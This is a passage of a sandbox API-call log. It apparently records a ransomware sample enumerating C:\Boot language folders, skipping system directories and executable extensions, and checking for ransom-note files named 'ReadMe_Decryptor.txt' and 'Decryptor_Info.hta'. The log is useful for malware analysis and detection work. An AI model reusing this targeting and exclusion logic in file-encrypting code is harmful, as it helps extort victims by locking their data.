FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.454] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.454] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.454] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.454] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.454] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.454] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.454] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.454] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.454] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.454] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.454] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.454] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.455] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b03c0 [0106.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.455] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.455] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.455] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0106.455] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0106.455] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0106.455] lstrlenW (lpString="tr-TR") returned 5 [0106.455] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="tr-TR" | out: lpString1="C:\\Boot\\tr-TR") returned="C:\\Boot\\tr-TR" [0106.455] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Windows") returned -1 [0106.455] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.455] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.455] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\ProgramData") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Intel") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\msys32") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Qt") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\ProgramData") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Program Files") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Windows") returned -1 [0106.456] lstrcmpiW (lpString1="C:\\Boot\\tr-TR", lpString2="C:\\Program Files (x86)") returned -1 [0106.456] lstrcatW (in: lpString1="C:\\Boot\\tr-TR", lpString2="\\" | out: lpString1="C:\\Boot\\tr-TR\\") returned="C:\\Boot\\tr-TR\\" [0106.456] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0106.456] FindFirstFileExW (in: lpFileName="C:\\Boot\\tr-TR\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.458] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.458] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.458] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.458] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.458] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.458] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.458] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.458] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.458] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.458] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.458] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.458] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0408 [0106.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.458] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.459] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.459] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0106.459] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0106.459] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0106.459] lstrlenW (lpString="zh-CN") returned 5 [0106.459] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-CN" | out: lpString1="C:\\Boot\\zh-CN") returned="C:\\Boot\\zh-CN" [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Windows") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\ProgramData") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.459] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Intel") returned -1 [0106.460] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\msys32") returned -1 [0106.460] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Qt") returned -1 [0106.460] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\ProgramData") returned -1 [0106.460] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Program Files") returned -1 [0106.460] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Windows") returned -1 [0106.460] lstrcmpiW (lpString1="C:\\Boot\\zh-CN", lpString2="C:\\Program Files (x86)") returned -1 [0106.460] lstrcatW (in: lpString1="C:\\Boot\\zh-CN", lpString2="\\" | out: lpString1="C:\\Boot\\zh-CN\\") returned="C:\\Boot\\zh-CN\\" [0106.460] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0106.460] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-CN\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.461] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.461] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.461] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.461] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.461] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.461] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.461] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.461] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.461] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.461] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.461] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.461] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.461] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0450 [0106.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.462] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.462] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.462] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0106.462] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0106.462] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0106.462] lstrlenW (lpString="zh-HK") returned 5 [0106.462] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-HK" | out: lpString1="C:\\Boot\\zh-HK") returned="C:\\Boot\\zh-HK" [0106.462] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Windows") returned -1 [0106.462] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.462] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.462] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\ProgramData") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Intel") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\msys32") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Qt") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\ProgramData") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Program Files") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Windows") returned -1 [0106.463] lstrcmpiW (lpString1="C:\\Boot\\zh-HK", lpString2="C:\\Program Files (x86)") returned -1 [0106.463] lstrcatW (in: lpString1="C:\\Boot\\zh-HK", lpString2="\\" | out: lpString1="C:\\Boot\\zh-HK\\") returned="C:\\Boot\\zh-HK\\" [0106.463] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0106.463] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-HK\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.465] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.465] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.465] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.465] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.465] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.465] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.465] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.465] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.465] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.465] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.465] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.465] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.465] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.465] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.465] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.465] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.465] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.465] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.465] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0498 [0106.466] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.466] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.466] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.466] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0106.466] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0106.466] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0106.466] lstrlenW (lpString="zh-TW") returned 5 [0106.466] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-TW" | out: lpString1="C:\\Boot\\zh-TW") returned="C:\\Boot\\zh-TW" [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Windows") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\ProgramData") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.466] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Intel") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\msys32") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Qt") returned -1 